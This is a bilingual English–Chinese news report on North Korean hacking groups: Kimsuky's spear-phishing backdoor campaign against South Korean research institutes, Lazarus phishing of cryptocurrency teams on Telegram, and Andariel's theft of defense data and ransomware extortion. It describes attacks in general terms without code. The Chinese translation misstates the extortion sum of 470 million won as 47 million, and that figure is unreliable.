朝鲜的Kimsuky瞄准韩国研究机构进行后门攻击

The North Korean threat actor known as Kimsuky has been observed targeting research institutes in South Korea as part of a spear-phishing campaign with the ultimate goal of distributing backdoors on compromised systems.

这个被称为Kimsuky的朝鲜威胁行为者已被观察到以鱼叉式网络钓鱼活动的一部分，针对韩国研究所，其最终目标是在受损系统上分发后门。

"The threat actor ultimately uses a backdoor to steal information and execute commands," the AhnLab Security Emergency Response Center (ASEC) said in an analysis posted last week.

AhnLab安全应急响应中心（ASEC）在上周发布的分析中表示：“威胁行为者最终使用后门窃取信息并执行命令。”

The attack chains commence with an import declaration lure that's actually a malicious JSE file containing an obfuscated PowerShell script, a Base64-encoded payload, and a decoy PDF document.

攻击链开始于一个进口声明诱饵，其实是一个包含混淆的PowerShell脚本、Base64编码有效载荷和一个假的PDF文档的恶意JSE文件。

The next stage entails opening the PDF file as a diversionary tactic, while the PowerShell script is executed in the background to launch the backdoor.

下一阶段涉及打开PDF文件作为一种转移注意力的策略，同时在后台执行PowerShell脚本来启动后门。

The malware, for its part, is configured to collect network information and other relevant data (i.e., host name, user name, and operating system version) and transmit the encoded details to a remote server.

就其本身而言，恶意软件被配置为收集网络信息和其他相关数据（即主机名、用户名和操作系统版本），并将编码的详细信息传输到远程服务器。

It's also capable of running commands, executing additional payloads, and terminating itself, turning it into a backdoor for remote access to the infected host.

它还能够运行命令，执行额外的有效载荷，并终止自身，将其变成用于远程访问受感染主机的后门。

Kimsuky, active since at least 2012, started off targeting South Korean government entities, think tanks, and individuals identified as experts in various fields, before expanding its victimology footprint to encompass Europe, Russia, and the U.S.

自2012年以来活跃的Kimsuky一开始针对韩国政府实体、智库和在各个领域被确定为专家的个人，然后扩大其受害范围，涵盖了欧洲、俄罗斯和美国。

Earlier this month, the U.S. Treasury Department sanctioned Kimsuky for gathering intelligence to support North Korea's strategic objectives, including geopolitical events, foreign policy, and diplomatic efforts.

本月早些时候，美国财政部对Kimsuky进行了制裁，因为其收集情报以支持朝鲜的战略目标，包括地缘政治事件、外交政策和外交努力。

"Kimsuky has focused its intelligence collection activities on foreign policy and national security issues related to the Korean peninsula, nuclear policy, and sanctions," cybersecurity firm ThreatMon noted in a recent report.

网络安全公司ThreatMon在最近的一份报告中指出：“Kimsuky一直将其情报收集活动重点放在了与朝鲜半岛、核政策和制裁相关的外交政策和国家安全问题上。”

The state-sponsored group has also been observed leveraging booby-trapped URLs that, when clicked, download a bogus ZIP archive masquerading as an update for the Chrome browser to deploy a malicious VBScript from Google Drive that employs the cloud storage as a conduit for data exfiltration and command-and-control (C2).

这个国家支持的组织也被观察到利用陷阱网址，当被点击时，它会下载一个伪装成Chrome浏览器更新的虚假ZIP存档，以便从Google Drive部署一个恶意VBScript，利用云存储作为数据外泄和命令与控制（C2）的渠道。

Lazarus Group Goes Phishing on Telegram

拉萨鲁斯组织在Telegram上进行网络钓鱼

The development comes as blockchain security company SlowMist implicated the notorious North Korea-backed outfit called the Lazarus Group in a widespread phishing campaign on Telegram targeting the cryptocurrency sector.

这一发展发生在区块链安全公司SlowMist指责臭名昭著的朝鲜支持的组织拉萨鲁斯组织在Telegram上针对加密货币领域展开广泛网络钓鱼活动之际。

"More recently, these hackers have escalated their tactics by posing as reputable investment institutions to execute phishing scams against various cryptocurrency project teams," the Singapore-based firm said.

“最近，这些黑客通过假扮声誉良好的投资机构对各种加密货币项目团队进行网络钓鱼诈骗的策略升级了。”

After establishing rapport, the targets are deceived into downloading a malicious script under the guise of sharing an online meeting link that facilitates crypto theft.

建立关系后，目标被欺骗下载一个恶意脚本，伪装成分享在线会议链接，以促进加密货币的窃取。

It also follows a report from the Seoul Metropolitan Police Agency (SMPA) that accused the Lazarus sub-cluster codenamed Andariel of stealing technical information about anti-aircraft weapon systems from domestic defense companies and laundering ransomware proceeds back to North Korea.

此外，首尔都市警察厅（SMPA）的一份报告指控拉萨鲁斯的子集团，代号Andariel，从国内国防公司窃取高射炮武器系统的技术信息，并将勒索软件所得洗钱回朝鲜。

It is estimated that more than 250 files amounting to 1.2 terabytes have been stolen in the attacks. To cover up the tracks, the adversary is said to have used servers from a local company that "rents servers to subscribers with unclear identities" as an entry point.

据估计，攻击中已窃取了250多个文件，总计1.2太字节。为了掩盖踪迹，对手据说使用了一个“向未明身份订户租用服务器”的当地公司作为一个入口点。

In addition, the group extorted 470 million won ($356,000) worth of bitcoin from three South Korean firms in ransomware attacks and laundered them through virtual asset exchanges such as Bithumb and Binance. It's worth noting that Andariel has been linked to the deployment of Maui ransomware in the past.

此外，该组织从三家韩国公司的勒索软件攻击中勒索了价值4700万韩元（35.6万美元）的比特币，并通过Bithumb和Binance等虚拟资产交易所进行了洗钱。值得注意的是，Andariel过去曾与Maui勒索软件的部署有关。

原文始发于微信公众号（知机安全）：朝鲜的Kimsuky瞄准韩国研究机构进行后门攻击